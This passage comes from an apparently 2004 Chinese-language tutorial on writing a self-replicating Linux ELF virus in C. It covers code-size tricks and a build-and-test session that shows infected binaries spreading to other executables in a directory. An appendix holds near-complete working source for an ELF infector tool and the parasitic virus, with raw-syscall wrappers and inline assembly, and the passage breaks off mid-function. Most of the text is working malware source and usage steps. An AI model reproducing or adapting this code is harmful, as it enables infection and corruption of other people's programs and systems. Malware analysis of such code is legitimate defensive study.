? ? ? ? :"0" (n/4), "q" (n),"1" ((long) to),"2" ((long) from)
? ? ? ? : "memory");
? ? return (to);
}


9 保證病毒代碼的瘦身需要


為了保證病毒代碼體積不至于過于龐大,影響病毒代碼的感染,編寫代碼時也要注意
代碼體積問題。由于采用C代碼的方式,一些函數調用都是內聯的方式,因此每多一個
調用都會引起代碼體積的增加。
在進行ELF文件讀寫更是如此,read/write被頻繁的調用。為了減小這方面的影響,對
目標ELF文件進行了一個mmap處理,這樣地址空間直接被映射到文件,就消除了讀目標
文件時所要做的read調用,節省了一些空間:


? ? ehdr = g_mmap2(0, stat.st_size, PROT_WRITE|PROT_READ, MAP_SHARED, fd, 0);
? ? if (ehdr == MAP_FAILED) {
? ? ? ? goto err;
? ? }
? ?
? ? /* Check ELF magic-ident */
? ? if (ehdr->e_ident[EI_MAG0] != 0x7f
? ? ? ? || ehdr->e_ident[EI_MAG1] != 'E'
? ? ? ? || ehdr->e_ident[EI_MAG2] != 'L'
? ? ? ? || ehdr->e_ident[EI_MAG3] != 'F'
? ? ? ? || ehdr->e_ident[EI_CLASS] != ELFCLASS32
? ? ? ? || ehdr->e_ident[EI_DATA] != ELFDATA2LSB
? ? ? ? || ehdr->e_ident[EI_VERSION] != EV_CURRENT
? ? ? ? || ehdr->e_type != ET_EXEC
? ? ? ? || ehdr->e_machine != EM_386
? ? ? ? || ehdr->e_version != EV_CURRENT
? ? ? ? ) {
? ? ? ? V_DEBUG_WRITE(1, &err_type, sizeof(err_type));
? ? ? ? goto err;
? ? }


當前的代碼都是用C編寫,這樣很難象匯編代碼那樣進行更高程度的精簡,不過目前的
代碼體積還在合理的范圍,
在調試狀態和標準狀態分別是1744和1248
? ? #ifndef NDEBUG
? ? #define PARACODE_LENGTH 1744
? ? #else
? ? #define PARACODE_LENGTH 1248
? ? #endif


10 數據結構的不一致


? ? 與C庫的代碼調用類似,我們使用的頭文件中有一些數據類型的定義是經過
包裝的,與系統調用中使用的并不相同。代碼相關的兩個數據結構,單獨提取了出來。


struct dirent {
? ? long ? ? ? ?d_ino;
? ? unsigned long ? ?d_off;
? ? unsigned short ? ?d_reclen;
? ? char ? ? ? ?d_name[256]; /* We must not include limits.h! */
};


struct stat {
? ? unsigned long ?st_dev;
? ? unsigned long ?st_ino;
? ? unsigned short st_mode;
? ? unsigned short st_nlink;
? ? unsigned short st_uid;
? ? unsigned short st_gid;
? ? unsigned long ?st_rdev;
? ? unsigned long ?st_size;
? ? unsigned long ?st_blksize;
? ? unsigned long ?st_blocks;
? ? unsigned long ?st_atime;
? ? unsigned long ?st_atime_nsec;
? ? unsigned long ?st_mtime;
? ? unsigned long ?st_mtime_nsec;
? ? unsigned long ?st_ctime;
? ? unsigned long ?st_ctime_nsec;
? ? unsigned long ?__unused4;
? ? unsigned long ?__unused5;
};


五、** 在一個新的編譯環境下的調試方法


grip2@linux:~/tmp/virus> ls
g-elf-infector.c ?gsyscall.h ?gunistd.h ?gvirus.c ?gvirus.h ?foo.c ?Makefile ?parasite-sample.c ?parasite-sample.h


調整Makefile文件,將編譯模式改為調試模式,即關掉-DNDEBUG選項
grip2@linux:~/tmp/virus> cat Makefile
all: foo gei
gei: g-elf-infector.c gvirus.o
? ? ? ? gcc -O2 $< gvirus.o -o gei -Wall #-DNDEBUG
foo: foo.c
? ? ? ? gcc $< -o foo
gvirus.o: gvirus.c
? ? ? ? gcc $< -O2 -c -o gvirus.o -fomit-frame-pointer -Wall #-DNDEBUG
clean:
? ? ? ? rm *.o -rf
? ? ? ? rm foo -rf
? ? ? ? rm gei -rf
? ? ??
編譯代碼
grip2@linux:~/tmp/virus> make
gcc foo.c -o foo
gcc gvirus.c -O2 -c -o gvirus.o -fomit-frame-pointer -Wall #-DNDEBUG
gcc -O2 g-elf-infector.c gvirus.o -o gei -Wall #-DNDEBUG


先獲取病毒代碼長度,然后調整gvirus.c中的#define PARACODE_LENGTH定義
grip2@linux:~/tmp/virus> ./gei -l ? ?<-- 這里獲取病毒代碼的長度
Parasite code length: 1744


獲取病毒代碼開始位置和0xaabbccdd的地址,計算存放返回地址的地址的偏移
grip2@linux:~/tmp/virus> objdump -d gei|grep aabbccdd
?8049427: ? ? ? 68 dd cc bb aa ? ? ? ? ?push ? $0xaabbccdd
grip2@linux:~/tmp/virus> objdump -d gei|grep ""
08048d80 :
?8049450: ? ? ? e9 2b f9 ff ff ? ? ? ? ?jmp ? ?8048d80?
grip2@linux:~/tmp/virus> objdump -d gei|grep ":"
08048d80 :


0x8049427與0x8048d80相減即獲得我們需要的偏移,
用這個值更新gvirus.h中的#define PARACODE_RETADDR_ADDR_OFFSET宏的值


重新編譯
grip2@linux:~/tmp/virus> make clean
rm *.o -rf
rm foo -rf
rm gei -rf
grip2@linux:~/tmp/virus> make
gcc foo.c -o foo
gcc gvirus.c -O2 -c -o gvirus.o -fomit-frame-pointer -Wall #-DNDEBUG
gcc -O2 g-elf-infector.c gvirus.o -o gei -Wall #-DNDEBUG


grip2@linux:~/tmp/virus> ls
gei ? ? ? ? ? ? ? gsyscall.h ?gvirus.c ?gvirus.o ?foo.c ? ?parasite-sample.c
g-elf-infector.c ?gunistd.h ? gvirus.h ?foo ? ? ?Makefile ?parasite-sample.h


建立一個測試目錄,測試一下
grip2@linux:~/tmp/virus> mkdir test
grip2@linux:~/tmp/virus> cp gei foo test
grip2@linux:~/tmp/virus> cd test
grip2@linux:~/tmp/virus/test> ls
gei ?foo
grip2@linux:~/tmp/virus/test> cp foo h


制作帶毒程序
grip2@linux:~/tmp/virus/test> ./gei h
file size: 8668
e_phoff: 00000034
e_shoff: 00001134
e_phentsize: 00000020
e_phnum: 00000008
e_shentsize: 00000028
e_shnum: 00000025
text segment file offset: 0
[15 sections patched]
grip2@linux:~/tmp/virus/test> ll
total 44
-rwxr-xr-x ?1 grip2 users 14211 2004-12-13 07:50 gei
-rwxr-xr-x ?1 grip2 users 12764 2004-12-13 07:51 h
-rwxr-xr-x ?1 grip2 users ?8668 2004-12-13 07:50 foo


運行帶毒程序
grip2@linux:~/tmp/virus/test> ./h
.
..
gei
foo
h
.backup.h
real elf point
grip2@linux:~/tmp/virus/test> ll
total 52
-rwxr-xr-x ?1 grip2 users 18307 2004-12-13 07:51 gei
-rwxr-xr-x ?1 grip2 users 12764 2004-12-13 07:51 h
-rwxr-xr-x ?1 grip2 users 12764 2004-12-13 07:51 foo


測試上面帶毒程序運行后,是否感染了其他ELF程序
grip2@linux:~/tmp/virus/test> ./foo
.
..
gei
Better luck next file
foo
h
Better luck next file
.backup.h
Better luck next file
real elf point


OK,成功
grip2@linux:~/tmp/virus/test> cp ../foo hh
grip2@linux:~/tmp/virus/test> ll
total 64
-rwxr-xr-x ?1 grip2 users 18307 2004-12-13 07:51 gei
-rwxr-xr-x ?1 grip2 users 12764 2004-12-13 07:51 h
-rwxr-xr-x ?1 grip2 users ?8668 2004-12-13 07:51 hh
-rwxr-xr-x ?1 grip2 users 12764 2004-12-13 07:51 foo


grip2@linux:~/tmp/virus/test> ./foo
.
..
gei
Better luck next file
foo
h
Better luck next file
.backup.h
Better luck next file
hh
real elf point
grip2@linux:~/tmp/virus/test>


六、** 最后


? ? 由于我既不是一個virus coder也不是一個anti-virus coder,所以對病毒
技術的掌握應該是有欠缺的。如果在文章中對病毒技術的描述不夠準確,分析不夠到
位,還請指正,謝謝。




七、** 參考文獻


1 Silvio Cesare 的《UNIX ELF PARASITES AND VIRUS》


2 ELF文檔


3 更多的安全技術交流
http://www.linuxforum.net/forum/showflat.php?Cat=&Board=security&
Number=479955&page=0&view=collapsed&sb=5&o=31&fpart=




八、** 附錄 - ELF文件感染工具和病毒原型源代碼


------------------------------ g-elf_infector.c ------------------------------


/*
?* gei - ELF Infector v0.0.2 ?(2004)
?* written by grip2?
?*/


#include?
#include?
#include?
#include?
#include?
#include?
#include?
#include?


#include "gvirus.h"


#define PAGE_SIZE 4096
#define PAGE_ALIGN(a) (((a) + PAGE_SIZE - 1) & ~(PAGE_SIZE - 1))


static int elf_infect(const char *filename,
? ? ? ? void *para_code,
? ? ? ? unsigned int para_code_size,
? ? ? ? unsigned long retaddr_addr_offset);


int main(int argc, char *argv[])
{
#define MAX_FILENAME_LEN 256
? ? char backup[MAX_FILENAME_LEN*4];
? ? char restore[MAX_FILENAME_LEN*4];


? ? if (argc != 2) {
? ? ? ? fprintf(stderr,
? ? ? ? ? ? "gei - ELF Infector v0.0.2 written by grip2 \n");
? ? ? ? fprintf(stderr, "Usage: %s \n", argv[0]);
? ? ? ? return 1;
? ? }


? ? if (strcmp(argv[1], "-l") == 0) {
? ? ? ? fprintf(stderr, "Parasite code length: %d\n",
? ? ? ? ? ? ? ? ?site_code_end - ?site_code);
? ? ? ? return 1;
? ? }


? ? if (strlen(argv[1]) > MAX_FILENAME_LEN) {
? ? ? ? fprintf(stderr, "filename too long!\n");
? ? ? ? return 1;
? ? }
? ?
? ? sprintf(backup, "cp -f %s .backup.%s\n", argv[1], argv[1]);
? ? sprintf(restore, "cp -f .backup.%s %s\n", argv[1], argv[1]);


? ? system(backup);
? ? if (elf_infect(argv[1], ?site_code,
? ? ? ? ? ? ?site_code_end - ?site_code,
? ? ? ? ? ? PARACODE_RETADDR_ADDR_OFFSET) < 0) {
? ? ? ? system(restore);
? ? ? ? return 1;
? ? }


? ? return 0;
}


static int elf_infect(const char *filename,
? ? ? ? void *para_code,
? ? ? ? unsigned int para_code_size,
? ? ? ? unsigned long retaddr_addr_offset)
{
? ? int fd = -1;
? ? int tmp_fd = -1;
? ? Elf32_Ehdr *ehdr = NULL;
? ? Elf32_Phdr *phdr;
? ? Elf32_Shdr *shdr;
? ? int i;
? ? int txt_index;
? ? struct stat stat;
? ? int align_code_size;
? ? unsigned long org_entry;
? ? void *new_code_pos;
? ? int tmp_flag;
? ? int size;
? ? unsigned char tmp_para_code[PAGE_SIZE];


? ? char *tmpfile;
? ? tmpfile = tempnam(NULL, "infector");


? ? fd = open(filename, O_RDWR);
? ? if (fd == -1) {
? ? ? ? perror(filename);
? ? ? ? goto err;
? ? }


? ? if (fstat(fd, &stat) == -1) {
? ? ? ? perror("fstat");
? ? ? ? goto err;
? ? }


#ifndef NDEBUG
? ? printf("file size: %lu\n", stat.st_size);
#endif


? ? ehdr = mmap(0, stat.st_size, PROT_WRITE|PROT_READ, MAP_SHARED, fd, 0);
? ? if (ehdr == MAP_FAILED) {
? ? ? ? perror("mmap ehdr");
? ? ? ? goto err;
? ? }
? ?
? ? /* Check ELF magic-ident */
? ? if (ehdr->e_ident[EI_MAG0] != 0x7f
? ? ? ? || ehdr->e_ident[EI_MAG1] != 'E'
? ? ? ? || ehdr->e_ident[EI_MAG2] != 'L'
? ? ? ? || ehdr->e_ident[EI_MAG3] != 'F'
? ? ? ? || ehdr->e_ident[EI_CLASS] != ELFCLASS32
? ? ? ? || ehdr->e_ident[EI_DATA] != ELFDATA2LSB
? ? ? ? || ehdr->e_ident[EI_VERSION] != EV_CURRENT
? ? ? ? || ehdr->e_type != ET_EXEC
? ? ? ? || ehdr->e_machine != EM_386
? ? ? ? || ehdr->e_version != EV_CURRENT
? ? ? ? ) {
? ? ? ? fprintf(stderr, "File type not supported\n");
? ? ? ? goto err;
? ? }


#ifndef NDEBUG
? ? printf("e_phoff: %08x\ne_shoff: %08x\n",
? ? ? ? ? ? ehdr->e_phoff, ehdr->e_shoff);
? ? printf("e_phentsize: %08x\n", ehdr->e_phentsize);
? ? printf("e_phnum: %08x\n", ehdr->e_phnum);
? ? printf("e_shentsize: %08x\n", ehdr->e_shentsize);
? ? printf("e_shnum: %08x\n", ehdr->e_shnum);
#endif


? ? align_code_size = PAGE_ALIGN(para_code_size);


? ? /* Get program header and section header start address */
? ? phdr = (Elf32_Phdr *) ((unsigned long) ehdr + ehdr->e_phoff);
? ? shdr = (Elf32_Shdr *) ((unsigned long) ehdr + ehdr->e_shoff);


? ? /* Locate the text segment */
? ? txt_index = 0;
? ? while (1) {
? ? ? ? if (txt_index == ehdr->e_phnum - 1) {
? ? ? ? ? ? fprintf(stderr, "Invalid e_phnum, text segment not found.\n");
? ? ? ? ? ? goto err;
? ? ? ? }
? ? ? ? if (phdr[txt_index].p_type == PT_LOAD
? ? ? ? ? ? && phdr[txt_index].p_flags == (PF_R|PF_X)) { /* text segment */
#ifndef NDEBUG
? ? ? ? ? ? printf("text segment file offset: %u\n", phdr[txt_index].p_offset);
#endif
? ? ? ? ? ? if (phdr[txt_index].p_vaddr + phdr[txt_index].p_filesz + align_code_size
? ? ? ? ? ? ? ? ? ? ? ? > phdr[txt_index+1].p_vaddr) {
? ? ? ? ? ? ? ? fprintf(stderr, "Better luck next file :-)\n"); ??
? ? ? ? ? ? ? ? goto err;
? ? ? ? ? ? }


? ? ? ? ? ? break;
? ? ? ? }
? ? ? ? txt_index++;
? ? } ??


? ? /* Modify the entry point of the ELF */
? ? org_entry = ehdr->e_entry;
? ? ehdr->e_entry = phdr[txt_index].p_vaddr + phdr[txt_index].p_filesz;


? ? new_code_pos =
? ? ? ? (void *) ehdr + phdr[txt_index].p_offset + phdr[txt_index].p_filesz;


? ? /* Increase the p_filesz and p_memsz of text segment
? ? ?* for new code */
? ? phdr[txt_index].p_filesz += align_code_size;
? ? phdr[txt_index].p_memsz += align_code_size;


? ? for (i = 0; i < ehdr->e_phnum; i++)
? ? ? ? if (phdr[i].p_offset >= (unsigned long) new_code_pos - (unsigned long) ehdr)
? ? ? ? ? ? phdr[i].p_offset += align_code_size;


? ? tmp_flag = 0;
? ? for (i = 0; i < ehdr->e_shnum; i++) {
? ? ? ? if (shdr[i].sh_offset >= (unsigned long) new_code_pos - (unsigned long) ehdr) {
? ? ? ? ? ? shdr[i].sh_offset += align_code_size;
? ? ? ? ? ? if (!tmp_flag && i) { /* associating the new_code to the last
? ? ? ? ? ? ? ? ? ? ? ? ? ?* section in the text segment */
? ? ? ? ? ? ? ? shdr[i-1].sh_size += align_code_size;
? ? ? ? ? ? ? ? tmp_flag = 1;
? ? ? ? ? ? ? ? printf("[%d sections patched]\n", i-1);
? ? ? ? ? ? }
? ? ? ? }
? ? }


? ? /* Increase p_shoff in the ELF header */
? ? ehdr->e_shoff += align_code_size;


? ? /* Make a new file */
? ? tmp_fd = open(tmpfile, O_WRONLY|O_CREAT, stat.st_mode);
? ? if (tmp_fd == -1) {
? ? ? ? perror("open");
? ? ? ? goto err;
? ? }


? ? size = new_code_pos - (void *) ehdr;
? ? if (write(tmp_fd, ehdr, size) != size) {
? ? ? ? perror("write");
? ? ? ? goto err;
? ? }


? ? memcpy(tmp_para_code, para_code, para_code_size);
? ? memcpy(tmp_para_code + retaddr_addr_offset,
? ? ? ? ? ? &org_entry, sizeof(org_entry));
? ? if (write(tmp_fd, tmp_para_code, align_code_size) != align_code_size) {
? ? ? ? perror("write");
? ? ? ? goto err;
? ? }
? ?
? ? if (write(tmp_fd, (void *) ehdr + size, stat.st_size - size)
? ? ? ? ? ? ? ? != stat.st_size - size) {
? ? ? ? perror("write");
? ? ? ? goto err;
? ? }


? ? close(tmp_fd);
? ? munmap(ehdr, stat.st_size);
? ? close(fd);


? ? if (rename(tmpfile, filename) == -1) {
? ? ? ? perror("rename");
? ? ? ? goto err;
? ? }


? ? return 0;
err:
? ? if (tmp_fd != -1)
? ? ? ? close(tmp_fd);
? ? if (ehdr)
? ? ? ? munmap(ehdr, stat.st_size);
? ? if (fd != -1)
? ? ? ? close(fd);
? ? return -1;
}
------------------------------ g-elf_infector.c ------------------------------


------------------------------ gvirus.h ------------------------------
#ifndef _G2_PARASITE_CODE_
#define _G2_PARASITE_CODE_


#ifndef NDEBUG
#define PARACODE_RETADDR_ADDR_OFFSET 1704
#else
#define PARACODE_RETADDR_ADDR_OFFSET 1232
#endif


void parasite_code(void);
void parasite_code_end(void);


#endif
------------------------------ gvirus.h ------------------------------


------------------------------ gvirus.c ------------------------------


/*
?* virus code in C (2004)
?* written by grip2?
?*/


#include "gsyscall.h"
#include "gvirus.h"
#include?


#define PAGE_SIZE 4096
#define PAGE_ALIGN(a) (((a) + PAGE_SIZE - 1) & ~(PAGE_SIZE - 1))


#ifndef NDEBUG
#define PARACODE_LENGTH 1744
#else
#define PARACODE_LENGTH 1248
#endif


#ifndef NDEBUG
#define V_DEBUG_WRITE(...) \
? ? do {\
? ? ? ? g_write(__VA_ARGS__);\
? ? } while(0)
#else
#define V_DEBUG_WRITE(...)
#endif


static inline int infect_virus(
? ? ? ? const char *file,
? ? ? ? void *v_code,
? ? ? ? unsigned int v_code_size,
? ? ? ? unsigned long v_retaddr_addr_offset)
{
? ? int fd = -1;
? ? int tmp_fd = -1;
? ? Elf32_Ehdr *ehdr = NULL;
? ? Elf32_Phdr *phdr;
? ? Elf32_Shdr *shdr;
? ? int i;
? ? int txt_index;
? ? struct stat stat;
? ? int align_code_size;
? ? unsigned long org_entry;
? ? void *new_code_pos;
? ? int tmp_flag;
? ? int size;
? ? unsigned char tmp_v_code[PAGE_SIZE];


? ? char tmpfile[32] = {'/','t','m','p','/','.','g','v','i','r','u','s','\0'};


#ifndef NDEBUG
? ? char err_type[32] = {'f','i','l','e',' ','t','y','p','e',' ','n','o','t',' ',
? ? ? ? ? ? 's','u','p','p','o','r','t','e','d','\n','\0'};
? ? char luck[32] = {'B','e','t','t','e','r',' ','l','u','c','k',' ',
? ? ? ? ? ? 'n','e','x','t',' ','f','i','l','e','\n','\0'};
#endif


? ? fd = g_open(file, O_RDWR, 0);
? ? if (fd == -1) {
? ? ? ? goto err;
? ? }


? ? if (g_fstat(fd, &stat) == -1) {
? ? ? ? goto err;
? ? }


? ? ehdr = g_mmap2(0, stat.st_size, PROT_WRITE|PROT_READ, MAP_SHARED, fd, 0);
? ? if (ehdr == MAP_FAILED) {
? ? ? ? goto err;
? ? }
? ?
? ? /* Check ELF magic-ident */
? ? if (ehdr->e_ident[EI_MAG0] != 0x7f
? ? ? ? || ehdr->e_ident[EI_MAG1] != 'E'
? ? ? ? || ehdr->e_ident[EI_MAG2] != 'L'
? ? ? ? || ehdr->e_ident[EI_MAG3] != 'F'
? ? ? ? || ehdr->e_ident[EI_CLASS] != ELFCLASS32
? ? ? ? || ehdr->e_ident[EI_DATA] != ELFDATA2LSB
? ? ? ? || ehdr->e_ident[EI_VERSION] != EV_CURRENT
? ? ? ? || ehdr->e_type != ET_EXEC
? ? ? ? || ehdr->e_machine != EM_386
? ? ? ? || ehdr->e_version != EV_CURRENT
? ? ? ? ) {
? ? ? ? V_DEBUG_WRITE(1, &err_type, sizeof(err_type));
? ? ? ? goto err;
? ? }


? ? align_code_size = PAGE_ALIGN(v_code_size);


? ? /* Get program header and section header start address */
? ? phdr = (Elf32_Phdr *) ((unsigned long) ehdr + ehdr->e_phoff);
? ? shdr = (Elf32_Shdr *) ((unsigned long) ehdr + ehdr->e_shoff);


? ? /* Locate the text segment */
? ? txt_index = 0;
? ? while (1) {
? ? ? ? if (txt_index == ehdr->e_phnum - 1)
? ? ? ? ? ? goto err;


? ? ? ? if (phdr[txt_index].p_type == PT_LOAD
? ? ? ? ? ? && phdr[txt_index].p_flags == (PF_R|PF_X)) { /* text segment */
? ? ? ? ? ? if (phdr[txt_index].p_vaddr + phdr[txt_index].p_filesz + align_code_size
? ? ? ? ? ? ? ? ? ? ? ? > phdr[txt_index+1].p_vaddr) {
? ? ? ? ? ? ? ? V_DEBUG_WRITE(1, &luck, sizeof(luck)); ??
? ? ? ? ? ? ? ? goto err;
? ? ? ? ? ? }


? ? ? ? ? ? break;
? ? ? ? }
? ? ? ? txt_index++;
? ? } ??


? ? /* Modify the entry point of the ELF */
? ? org_entry = ehdr->e_entry;
? ? ehdr->e_entry = phdr[txt_index].p_vaddr + phdr[txt_index].p_filesz;


? ? new_code_pos =
? ? ? ? (void *) ehdr + phdr[txt_index].p_offset + phdr[txt_index].p_filesz;


? ? /* Increase the p_filesz and p_memsz of text segment
? ? ?* for new code */
? ? phdr[txt_index].p_filesz += align_code_size;
? ? phdr[txt_index].p_memsz += align_code_size;


? ? for (i = 0; i < ehdr->e_phnum; i++)
? ? ? ? if (phdr[i].p_offset >= (unsigned long) new_code_pos - (unsigned long) ehdr)
? ? ? ? ? ? phdr[i].p_offset += align_code_size;


? ? tmp_flag = 0;
? ? for (i = 0; i < ehdr->e_shnum; i++) {
? ? ? ? if (shdr[i].sh_offset >= (unsigned long) new_code_pos - (unsigned long) ehdr) {
? ? ? ? ? ? shdr[i].sh_offset += align_code_size;
? ? ? ? ? ? if (!tmp_flag && i) { /* associating the new_code to the last
? ? ? ? ? ? ? ? ? ? ? ? ? ?* section in the text segment */
? ? ? ? ? ? ? ? shdr[i-1].sh_size += align_code_size;
? ? ? ? ? ? ? ? tmp_flag = 1;
? ? ? ? ? ? }
? ? ? ? }
? ? }


? ? /* Increase p_shoff in the ELF header */
? ? ehdr->e_shoff += align_code_size;


? ? /* Make a new file */
? ? tmp_fd = g_open(tmpfile, O_WRONLY|O_CREAT|O_TRUNC, stat.st_mode);
? ? if (tmp_fd == -1) {
? ? ? ? goto err;
? ? }


? ? size = new_code_pos - (void *) ehdr;
? ? if (g_write(tmp_fd, ehdr, size) != size)
? ? ? ? goto err;


? ? __memcpy(tmp_v_code, v_code, v_code_size);
? ? __memcpy(tmp_v_code + v_retaddr_addr_offset, &org_entry, sizeof(org_entry));
? ? if (g_write(tmp_fd, tmp_v_code, align_code_size) != align_code_size) {
? ? ? ? goto err;
? ? }


? ? if (g_write(tmp_fd, (void *) ehdr + size, stat.st_size - size)
? ? ? ? ? ? ? ? != stat.st_size - size) {
? ? ? ? goto err;
? ? }


? ? g_close(tmp_fd);
? ? g_munmap(ehdr, stat.st_size);
? ? g_close(fd);


? ? if (g_rename(tmpfile, file) == -1) {
? ? ? ? goto err;
? ? }


? ? return 0;
err:
? ? if (tmp_fd != -1)
? ? ? ? g_close(tmp_fd);
? ? if (ehdr)
? ? ? ? g_munmap(ehdr, stat.st_size);
? ? if (fd != -1)
? ? ? ? g_close(fd);
? ? return -1;
}


static inline void virus_code(void)
{
? ? char dirdata[4096];
? ? struct dirent *dirp;
? ? int curfd;
? ? int nbyte, c;
? ? unsigned long para_code_start_addr;


? ? __asm__ volatile (
? ? ? ? "push %%eax\n\t"
? ? ? ? "push %%ecx\n\t"
? ? ? ? "push %%edx\n\t"
? ? ? ? ::);


? ? char curdir[2] = {'.', 0};
? ? char newline = '\n';


? ? curdir[0] = '.';
? ? curdir[1] = 0;
? ? newline = '\n';


? ? if ((curfd = g_open(curdir, O_RDONLY, 0)) < 0)
? ? ? ? goto out;
? ?
? ? /* Get start address of virus code */
? ? __asm__ volatile (
? ? ? ? "jmp get_start_addr\n"
? ? "infect_start:\n\t"
? ? ? ? "popl %0\n\t"
? ? ? ? :"=m" (para_code_start_addr)
? ? ? ? :);
? ? para_code_start_addr -= PARACODE_RETADDR_ADDR_OFFSET - 1;


? ? /* Infecting */
? ? while ((nbyte = g_getdents(curfd, (struct dirent *)
? ? ? ? ? ? ? ? &dirdata, sizeof(dirdata))) > 0) {
? ? ? ? c = 0;
? ? ? ? dirp = (struct dirent *) &dirdata;
? ? ? ? do {
? ? ? ? ? ? V_DEBUG_WRITE(1, dirp->d_name, dirp->d_reclen - (unsigned long)
? ? ? ? ? ? ? ? ? ? &(((struct dirent *) 0)->d_name));
? ? ? ? ? ? V_DEBUG_WRITE(1, &newline, sizeof(newline));
? ? ? ? ? ?
? ? ? ? ? ? infect_virus(dirp->d_name,
? ? ? ? ? ? ? ? ? ? (void *) para_code_start_addr,
? ? ? ? ? ? ? ? ? ? PARACODE_LENGTH,
? ? ? ? ? ? ? ? ? ? PARACODE_RETADDR_ADDR_OFFSET);


? ? ? ? ? ? c += dirp->d_reclen;
? ? ? ? ? ? if (c >= nbyte)
? ? ? ? ? ? ? ? break;
? ? ? ? ? ? dirp = (struct dirent *)((char *)dirp + dirp->d_reclen);
? ? ? ? } while (1);
? ? }
? ? g_close(curfd);
out:
? ? __asm__ volatile (
? ? ? ? "popl %%edx\n\t"
? ? ? ? "popl %%ecx\n\t"
? ? ? ? "popl %%eax\n\t"
? ? ? ? "addl $0x102c, %%esp\n\t"
? ? ? ? "popl %%ebx\n\t"
? ? ? ? "popl %%esi\n\t"
? ? ? ? "popl %%edi\n\t"
? ? ? ? "popl %%ebp\n\t"
? ? ? ? "jmp return\n"
? ? "get_start_addr:\n\t"
? ? ? ? "call infect_start\n"
? ? "return:\n\t"
? ? ? ? "push $0xAABBCCDD\n\t" /* push ret_addr */
? ? ? ? "ret\n"
? ? ? ? ::);
}


void parasite_code(void)
{
? ? virus_code();
}
void parasite_code_end(void) {parasite_code();}
------------------------------ gvirus.c ------------------------------


------------------------------ gunistd.h ------------------------------
#ifndef _G2_UNISTD_
#define _G2_UNISTD_


#define g__syscall_return(type, res) \
do { \
? ? if ((unsigned long)(res) >= (unsigned long)(-125)) { \
? ? ? ? res = -1; \
? ? } \
? ? return (type) (res); \
} while (0)


#define g_syscall0(type,name) \
type g_##name(void) \
{ \
long __res; \
__asm__ volatile ("int $0x80" \
? ? : "=a" (__res) \
? ? : "0" (__NR_##name)); \
g__syscall_return(type,__res); \
}


#define g_syscall1(type,name,type1,arg1) \
type g_##name(type1 arg1) \
{ \
long __res; \
__asm__ volatile ("int $0x80" \
? ? : "=a" (__res) \
? ? : "0" (__NR_##name),"b" ((long)(arg1))); \
g__syscall_return(type,__res); \
}


#define g_syscall2(type,name,type1,arg1,type2,arg2) \
type g_##name(type1 arg1,type2 arg2) \
{ \
long __res; \
__asm__ volatile ("int $0x80" \
? ? : "=a" (__res) \
? ? : "0" (__NR_##name),"b" ((long)(arg1)),"c" ((long)(arg2))); \
g__syscall_return(type,__res); \
}


#define g_syscall3(type,name,type1,arg1,type2,arg2,type3,arg3) \
type g_##name(type1 arg1,type2 arg2,type3 arg3) \
{ \
long __res; \
__asm__ volatile ("int $0x80" \
? ? : "=a" (__res) \
? ? : "0" (__NR_##name),"b" ((long)(arg1)),"c" ((long)(arg2)), \
? ? ? ? ? "d" ((long)(arg3))); \
g__syscall_return(type,__res); \
}


#define g_syscall4(type,name,type1,arg1,type2,arg2,type3,arg3,type4,arg4) \
type g_##name (type1 arg1, type2 arg2, type3 arg3, type4 arg4) \
{ \
long __res; \
__asm__ volatile ("int $0x80" \
? ? : "=a" (__res) \
? ? : "0" (__NR_##name),"b" ((long)(arg1)),"c" ((long)(arg2)), \
? ? ? "d" ((long)(arg3)),"S" ((long)(arg4))); \
g__syscall_return(type,__res); \
}


#define g_syscall5(type,name,type1,arg1,type2,arg2,type3,arg3,type4,arg4, \
? ? ? type5,arg5) \
type g_##name (type1 arg1,type2 arg2,type3 arg3,type4 arg4,type5 arg5) \
{ \
long __res; \
__asm__ volatile ("int $0x80" \
? ? : "=a" (__res) \
? ? : "0" (__NR_##name),"b" ((long)(arg1)),"c" ((long)(arg2)), \
? ? ? "d" ((long)(arg3)),"S" ((long)(arg4)),"D" ((long)(arg5))); \
g__syscall_return(type,__res); \
}


#define g_syscall6(type,name,type1,arg1,type2,arg2,type3,arg3,type4,arg4, \
? ? ? type5,arg5,type6,arg6) \
type g_##name (type1 arg1,type2 arg2,type3 arg3,type4 arg4,type5 arg5,type6 arg6) \
{ \
long __res; \
__asm__ volatile ("push %%ebp ; movl %%eax,%%ebp ; movl %1,%%eax ; int $0x80 ; pop %%ebp" \
? ? : "=a" (__res) \
? ? : "i" (__NR_##name),"b" ((long)(arg1)),"c" ((long)(arg2)), \
? ? ? "d" ((long)(arg3)),"S" ((long)(arg4)),"D" ((long)(arg5)), \
? ? ? "0" ((long)(arg6))); \
g__syscall_return(type,__res); \
}


#endif /* _G2_UNISTD_ */
------------------------------ gunistd.h ------------------------------


------------------------------ gsyscall.h ------------------------------


#ifndef _G2_SYSCALL_
#define _G2_SYSCALL_


#include?
#include?


#include?
#include?


#include "gunistd.h"


#define NULL 0


struct dirent {
? ? long ? ? ? ?d_ino;
? ? unsigned long ? ?d_off;
? ? unsigned short ? ?d_reclen;
? ? char ? ? ? ?d_name[256]; /* We must not include limits.h! */
};


struct stat {
? ? unsigned long ?st_dev;
? ? unsigned long ?st_ino;
? ? unsigned short st_mode;
? ? unsigned short st_nlink;
? ? unsigned short st_uid;
? ? unsigned short st_gid;
? ? unsigned long ?st_rdev;
? ? unsigned long ?st_size;
? ? unsigned long ?st_blksize;
? ? unsigned long ?st_blocks;
? ? unsigned long ?st_atime;
? ? unsigned long ?st_atime_nsec;
? ? unsigned long ?st_mtime;
? ? unsigned long ?st_mtime_nsec;
? ? unsigned long ?st_ctime;
? ? unsigned long ?st_ctime_nsec;
? ? unsigned long ?__unused4;
? ? unsigned long ?__unused5;
};


static inline g_syscall3(int, write, int, fd, const void *, buf, off_t, count);
static inline g_syscall3(int, getdents, uint, fd, struct dirent *, dirp, uint, count);
static inline g_syscall3(int, open, const char *, file, int, flag, int, mode);
static inline g_syscall1(int, close, int, fd);
static inline g_syscall6(void *, mmap2, void *, addr, size_t, len, int, prot,
? ? ? ? ? ?int, flags, int, fd, off_t, offset);
static inline g_syscall2(int, munmap, void *, addr, size_t, len);
static inline g_syscall2(int, rename, const char *, oldpath, const char *, newpath);
static inline g_syscall2(int, fstat, int, filedes, struct stat *, buf);


static inline void * __memcpy(void * to, const void * from, size_t n)
{
? ? int d0, d1, d2;
? ? __asm__ __volatile__(
? ? ? ? "rep ; movsl\n\t"
? ? ? ? "testb $2,%b4\n\t"
? ? ? ? "je 1f\n\t"
? ? ? ? "movsw\n"
? ? ? ? "1:\ttestb $1,%b4\n\t"
? ? ? ? "je 2f\n\t"
? ? ? ? "movsb\n"
? ? ? ? "2:"
